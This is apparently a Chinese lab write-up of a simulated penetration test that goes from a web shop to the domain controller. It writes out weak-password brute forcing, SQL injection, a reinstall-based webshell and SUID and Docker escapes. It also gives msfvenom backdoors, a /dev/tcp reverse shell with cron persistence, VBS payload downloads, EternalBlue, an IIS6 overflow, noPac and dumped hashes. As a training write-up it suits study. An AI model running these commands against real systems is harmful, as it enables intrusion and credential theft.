模拟实战从外网打点渗透到内网域控的笔记

2023-11-03 15:59

本文主要是介绍模拟实战从外网打点渗透到内网域控的笔记,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

信息收集

本次项目是一个是模拟渗透测试 电信诈骗网站,境外人员依赖该网站通过优惠卷诱导受害者进行消费,
诈骗受害人金钱。
前台地址
项目拓扑图
在这里插入图片描述

http://ip/user.php?mod=do&act=login&fromto=http%3A%2F%2F43.143.193.216%2F

后台地址

http://ip/admin/webadmin.php?mod=do&act=login

robots.txt

前台注册信息

18945612354

yesir

123456

个人中心:

http://ip/user.php

逍遥商城

在这里插入图片描述

根据响应返回值的不同,尝试爆破弱口令。

在这里插入图片描述

爆破成功,密码nasa123

在这里插入图片描述

代码审计

经过移动端的代码审计,发现存在注入

在这里插入图片描述

然后构造payload

在这里插入图片描述

跑一下sqlmap,爆出库表

在这里插入图片描述

得出管理员密码

nasa123

然后登录后台寻找漏洞

访问重装目录发现如下提示

在这里插入图片描述

要是重装需要删除install.lock文件

在后台备份处找到可以删除文件的功能点

在这里插入图片描述

尝试是否有任意文件删除漏洞

查看源代码

在这里插入图片描述

在这里插入图片描述

发现并没有对删除的目录进行过滤

利用任意文件删除漏洞删除install.lock文件

在这里插入图片描述

在这里插入图片描述

任意文件写入配合重装系统获取webshell

然后发现可以重装系统,这也是个重装系统漏洞。

在这里插入图片描述

然后通过任意文件写入getshell,因为重装信息会写到config.php,也就 给了我写马的机会.

拼接一句话

在这里插入图片描述

重装访问config.php成功拿到webshell。

在这里插入图片描述

提权

查找可以进行suid提权的命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

touch test
find test -exec whoami \;

在这里插入图片描述

判断在ls -alh /.dockerenv 容器内

ls -alh /.dockerenv

在这里插入图片描述

反向代理msf linux上线

在vps上设置 frps.ini

[common]
bind_port = 7000
token=yesir.aaaa

2.在内网的kali上配置frpc.ini

server_addr = vps-ip
server_port = 7000
token=yesir.aaaa
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
[msf2]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777

配置好运行客户端和服务端

3.msf生成linux elf后门文件

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.59.138 lport=6666 -f
elf -o yesir.elf

4.msf设置监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

5.webshell执行后门

chmod +x yesir.elf
find test -exec ./yesir.elf \;

在这里插入图片描述

提取成功,root权限

在这里插入图片描述

创建linux root用户

openssl passwd -1 -salt yesir 123456
echo 'yesir:$1$yesir$Apee9NXsjpedOFK06C6tu0:0:0:root:/root:/bin/bash' >>
/etc/passwd

在这里插入图片描述

创建交互shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.3$
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$ su moonsec
su moonsec
Password: 123456

在这里插入图片描述

docker提权

现在还是处于容器内,所以还要进行提权到宿主上。在docker如果启动的时候 --privileged=true 是 可以逃逸的。 挂载宿主硬盘到test目录

创建目录
mkdir /test
将宿主的目录挂载到test目录
mount /dev/sda1 /test
改变根目录为 /test
chroot /test

在这里插入图片描述

宿主的目录

在这里插入图片描述

创建反弹shell

echo '/bin/bash -i >& bash -i >&/dev/tcp/192.168.59.128/23333 0>&1' >
/root/sec.sh
chmod +x /root/sec.sh
cat /tmp/sec.sh
写到计划任务里
echo '*/1 * * * * root bash /root/sec.sh' >>/etc/crontab

得到第一个flag

在这里插入图片描述

成功写到计划任务里

在这里插入图片描述

nc监听,等待反弹shell

vps     nc -lnvp 23333

通过任务获取宿主的反弹shell

在这里插入图片描述

宿主ubuntu msf后门上线

下载后门 添加运行权限 执行即可

wget http://192.168.59.128/yesir.elf

msf上线成功

在这里插入图片描述

内网横向渗透

msf设置代理扫描内网

添加路由

run get_local_subnets
run autoroute -s 192.168.59.0/255.255.255.0
run autoroute -p

在这里插入图片描述

启用代理,使用sock5

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >

设置 kali 的 /etc/proxychains4.conf 文件

sudo vim /etc/proxychains4.conf

添加 socks5 127.0.0.1 1080

在这里插入图片描述

利用代理,nmap扫描内网445端口

proxychains4 nmap -sT -Pn 192.168.59.0/24 -p 445 --open

nmap扫描结果

在这里插入图片描述

使用fscan扫描内网存活主机与端口

proxychains4 ./fscan_amd64 -h 192.168.59.0/24 -np -no -nopoc  

fscan扫描结果

在这里插入图片描述

永恒之蓝

尝试对开放445端口的主机使用永恒之蓝攻击

use windows/smb/ms17_010_eternalblue
set pyaload windows/meterpreter/bind_tcp #选择正向shell
set rhosts 192.168.59.197
run

利用失败

在这里插入图片描述

根据扫描结果,发现有server2003的主机,尝试利用iis6.0 溢出获取权限

proxychains4 python2 ii6.py 192.168.59.144 80 192.168.59.128 4455

在这里插入图片描述

获得shell

在这里插入图片描述

S09-020-KB970483-CVE-2009-1535-IIS6 2003提权

vbs下载后门

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.se
nd:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>
downfile.vbs
cscript downfile.vbs http://192.168.59.128/IIS6.0.exe iis6.exe

获取系统权限

在这里插入图片描述

msf生成win后门上线

生成msf后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.59.128 lport=7777 -f exe -o s.exe

靶机下载msf后门

cscript downfile.vbs http://192.168.59.128/s.exe 2.exe

在这里插入图片描述

2003主机信息收集

内网10段扫描

C:\nasa>nbtscan -r 10.10.10.0/24

在这里插入图片描述

使用msf中的kiwi模块获取凭证

meterpreter > hashdump
Administrator:500:6c634e36565f85fc9c5014ae4718a7ee:f099c4a637f9b871487bbb03962f7
9b5::: 明文 admin555
ASPNET:1006:c5f4c32e080b1c0a19f45641a62db986:5643281884dd972acd9b0eaeecd13522:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW79FA760B73D:1000:a1323e561696c32ad68862a8c0118e7e:00dd987a1d0c4540f919b3eb5fc0b1
cd:::
IWAM_WWW79FA760B73D:1001:123dec921ecc0ca82f1106015d8abba7:556f2d1b30d88fc35eb8c4d573a5cd
14:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:f739006531fcc09af8615f957
5fa943c:::

smb 用户批量爆破

把netbios name设置用户列表 使用smb 登录模块进行批量弱口令测试

用户列表

administrator WIN2003 AD01 AD02 WIN7

使用smb模块

use scanner/smb/smb_login

在这里插入图片描述

psexec登录获取shell

use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.59.197
RHOSTS => 192.168.59.197
msf6 exploit(windows/smb/psexec) > set smbpass admin555
smbpass => admin555
msf6 exploit(windows/smb/psexec) > set smbuser WIN7
set payload windows/meterpreter/bind_tcp

impacket smbsxec 登录失败

└─$ proxychains4 python3 smbexec.py WIN7:admin555@10.10.10.142
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.10.142:445  ...  OK
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 

ms17_010_psexec 登录

use windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set smbuser win7
set smbpass admin555
run

在这里插入图片描述

win7主机信息收集

成功获取一个域普通用户

迁移下进程然后获取win7

hashdump

在这里插入图片描述

kiwi_cmd sekurlsa::logonPasswords

在这里插入图片描述

CVE-2021-42278 and CVE-2021-42287 攻击域控

工具地址:https://github.com/Ridter/noPac

在攻击域控之前修改/etc/resolve.conf,修改DNS为10.10.10.140

proxychains4 python noPac.py nasa.gov/test:'QWEasd!@#999' -dc-ip 10.10.10.140 -
dc-host AD01 -shell --impersonate administrator
proxychains4 noPac.py nasa.gov/test:'QWEasd!@#999' -dc-ip 10.10.10.140 -dc-host
AD01 --impersonate administrator -dump

在这里插入图片描述

域控的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fbe5588a79e40d41d77a40569c7b3
090:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::

根据域控hash获取域控的权限

在这里插入图片描述

备份域的权限

在这里插入图片描述

主机名flag
ad01ad01 moonsec_flag{2181d94fba9a1d2de2b5f6fb75f8ab08}
ad02moonsec_flag{d3eb9a9233e52948740d7eb8c3062d14}
win2003moon_flag{7555051b6d8a2dca27a29f9cb0d2e3a6}
ubuntumoonsec_flag{182be0c5cdcd5072bb1864cdee4d3d6e}
win7moon_flag{0b08bd98d279b88859b628cd8c061ae0}

这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控,这次渗透过程中学到了很多东西,但很多也是我应该熟练使用的。继续加油。

在这里插入图片描述

来人间一趟 你要看看太阳

这篇关于模拟实战从外网打点渗透到内网域控的笔记的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/339292

相关文章

网页解析 lxml 库--实战

lxml库使用流程 lxml 是 Python 的第三方解析库,完全使用 Python 语言编写,它对 XPath表达式提供了良好的支 持,因此能够了高效地解析 HTML/XML 文档。本节讲解如何通过 lxml 库解析 HTML 文档。 pip install lxml lxm| 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档,下面来介绍一下 lxml 库

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

【C++】_list常用方法解析及模拟实现

相信自己的力量,只要对自己始终保持信心,尽自己最大努力去完成任何事,就算事情最终结果是失败了,努力了也不留遗憾。💓💓💓 目录   ✨说在前面 🍋知识点一:什么是list? •🌰1.list的定义 •🌰2.list的基本特性 •🌰3.常用接口介绍 🍋知识点二:list常用接口 •🌰1.默认成员函数 🔥构造函数(⭐) 🔥析构函数 •🌰2.list对象

usaco 1.2 Transformations(模拟)

我的做法就是一个一个情况枚举出来 注意计算公式: ( 变换后的矩阵记为C) 顺时针旋转90°:C[i] [j]=A[n-j-1] [i] (旋转180°和270° 可以多转几个九十度来推) 对称:C[i] [n-j-1]=A[i] [j] 代码有点长 。。。 /*ID: who jayLANG: C++TASK: transform*/#include<

C#实战|大乐透选号器[6]:实现实时显示已选择的红蓝球数量

哈喽,你好啊,我是雷工。 关于大乐透选号器在前面已经记录了5篇笔记,这是第6篇; 接下来实现实时显示当前选中红球数量,蓝球数量; 以下为练习笔记。 01 效果演示 当选择和取消选择红球或蓝球时,在对应的位置显示实时已选择的红球、蓝球的数量; 02 标签名称 分别设置Label标签名称为:lblRedCount、lblBlueCount

【学习笔记】 陈强-机器学习-Python-Ch15 人工神经网络(1)sklearn

系列文章目录 监督学习:参数方法 【学习笔记】 陈强-机器学习-Python-Ch4 线性回归 【学习笔记】 陈强-机器学习-Python-Ch5 逻辑回归 【课后题练习】 陈强-机器学习-Python-Ch5 逻辑回归(SAheart.csv) 【学习笔记】 陈强-机器学习-Python-Ch6 多项逻辑回归 【学习笔记 及 课后题练习】 陈强-机器学习-Python-Ch7 判别分析 【学

系统架构师考试学习笔记第三篇——架构设计高级知识(20)通信系统架构设计理论与实践

本章知识考点:         第20课时主要学习通信系统架构设计的理论和工作中的实践。根据新版考试大纲,本课时知识点会涉及案例分析题(25分),而在历年考试中,案例题对该部分内容的考查并不多,虽在综合知识选择题目中经常考查,但分值也不高。本课时内容侧重于对知识点的记忆和理解,按照以往的出题规律,通信系统架构设计基础知识点多来源于教材内的基础网络设备、网络架构和教材外最新时事热点技术。本课时知识

滚雪球学Java(87):Java事务处理:JDBC的ACID属性与实战技巧!真有两下子!

咦咦咦,各位小可爱,我是你们的好伙伴——bug菌,今天又来给大家普及Java SE啦,别躲起来啊,听我讲干货还不快点赞,赞多了我就有动力讲得更嗨啦!所以呀,养成先点赞后阅读的好习惯,别被干货淹没了哦~ 🏆本文收录于「滚雪球学Java」专栏,专业攻坚指数级提升,助你一臂之力,带你早日登顶🚀,欢迎大家关注&&收藏!持续更新中,up!up!up!! 环境说明:Windows 10

hdu4431麻将模拟

给13张牌。问增加哪些牌可以胡牌。 胡牌有以下几种情况: 1、一个对子 + 4组 3个相同的牌或者顺子。 2、7个不同的对子。 3、13幺 贪心的思想: 对于某张牌>=3个,先减去3个相同,再组合顺子。 import java.io.BufferedInputStream;import java.io.BufferedReader;import java.io.IOExcepti

论文阅读笔记: Segment Anything

文章目录 Segment Anything摘要引言任务模型数据引擎数据集负责任的人工智能 Segment Anything Model图像编码器提示编码器mask解码器解决歧义损失和训练 Segment Anything 论文地址: https://arxiv.org/abs/2304.02643 代码地址:https://github.com/facebookresear